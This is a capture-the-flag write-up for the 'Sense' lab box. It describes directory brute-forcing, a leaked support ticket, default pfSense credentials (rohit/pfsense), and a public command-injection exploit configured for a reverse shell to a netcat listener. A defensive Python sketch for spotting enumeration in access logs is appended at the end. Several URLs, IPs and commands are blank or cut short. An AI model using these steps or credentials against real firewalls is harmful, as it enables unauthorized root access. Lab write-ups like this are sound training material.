Sense is an easy Linux box that can be exploited by performing a directory brute-force to identify the login page of pfSense. The brute-force also helps to identify a file that contains credentials for pfSense. This combination was used to exploit pfSense with a public exploit to obtain a root shell.


Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn

80/tcp  open  http
443/tcp open  https

Gobuster found the following locations: (Status: 200) (Status: 200) (Status: 200) [Size: 384]

The page:, showed the following message:

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

This strongly suggests a vulnerability is present. The following page:, showed an active user:

####Support ticket###

Please create the following user

username: Rohit
password: company defaults

After a couple of tries, it was found that the default combination is:
The user is now authenticated to the pfSense dashboard:


Searchsploit was used to identify vulnerabilities within pfSense, since the changelog.txt suggested there is an unpatched vulnerability.

jeroen@kali:~$ searchsploit pfsense injection
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection                                              | php/webapps/
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                | php/webapps/
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The following exploit was used to exploit this vulnerability: The script was modified as follows:

username = "rohit"
password = "pfsense"
listener_ip = ""
listener_port = "4444"
target_ip = ""
url = "https://{}/".format(target_ip)
proxied_url = ""

A netcat listener was set up and the script was run with:
python nc
This provided a root shell. From here the root.txt and user.txt can be retrieved.


This was a very easy box that could be exploited by properly brute-forcing for files and directories. The exploitation of pfSense was straightforward, so it didn’t take too long to root this box. Hope you had the same experience and enjoyed this writeup!
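
From the defending side, the directory brute-force that drove this box is loud in the web server's access log. The sketch below is an added example, not part of the original writeup: it flags clients that request many distinct missing paths in a short window and lists what they were served with a 200. The Common Log Format, the thresholds, the sample lines and the `/placeholder-users.txt` name are assumptions; only `changelog.txt` comes from the writeup.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: the web server logs in Common Log Format (not stated on the page).
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse(line):
    """Return (ip, timestamp, path without query string, status) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"].split("?", 1)[0], int(m["status"])

def detect_enumeration(lines, min_404=20, window=timedelta(seconds=60)):
    """Map each client that hit >= min_404 distinct missing paths inside
    `window` to the paths it was served with 200 (what the scan found)."""
    events = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        events[rec[0]].append(rec[1:])
    findings = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e[0])
        misses = [(ts, path) for ts, path, status in evs if status == 404]
        start = 0
        for end in range(len(misses)):
            # Slide the window start forward until it spans at most `window`.
            while misses[end][0] - misses[start][0] > window:
                start += 1
            if len({p for _, p in misses[start:end + 1]}) >= min_404:
                findings[ip] = sorted({p for _, p, s in evs if s == 200})
                break
    return findings

def sample_log():
    """Constructed log: one enumerating client, one ordinary client."""
    scan = [f'192.0.2.10 - - [01/Jan/2024:10:00:{i:02d} +0000] '
            f'"GET /word{i}.txt HTTP/1.1" 404 345' for i in range(30)]
    hits = ['192.0.2.10 - - [01/Jan/2024:10:00:31 +0000] "GET /changelog.txt HTTP/1.1" 200 271',
            '192.0.2.10 - - [01/Jan/2024:10:00:32 +0000] "GET /placeholder-users.txt HTTP/1.1" 200 106']
    normal = ['198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 6690',
              '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /favicon.ico HTTP/1.1" 404 345']
    return scan + hits + normal

if __name__ == "__main__":
    for ip, found in detect_enumeration(sample_log()).items():
        print(ip, "enumerated the web root and retrieved:", found)
```

The list of 200 responses is the part worth triaging first: any note, ticket or changelog file in it should be removed from the web root and any credentials it hints at rotated.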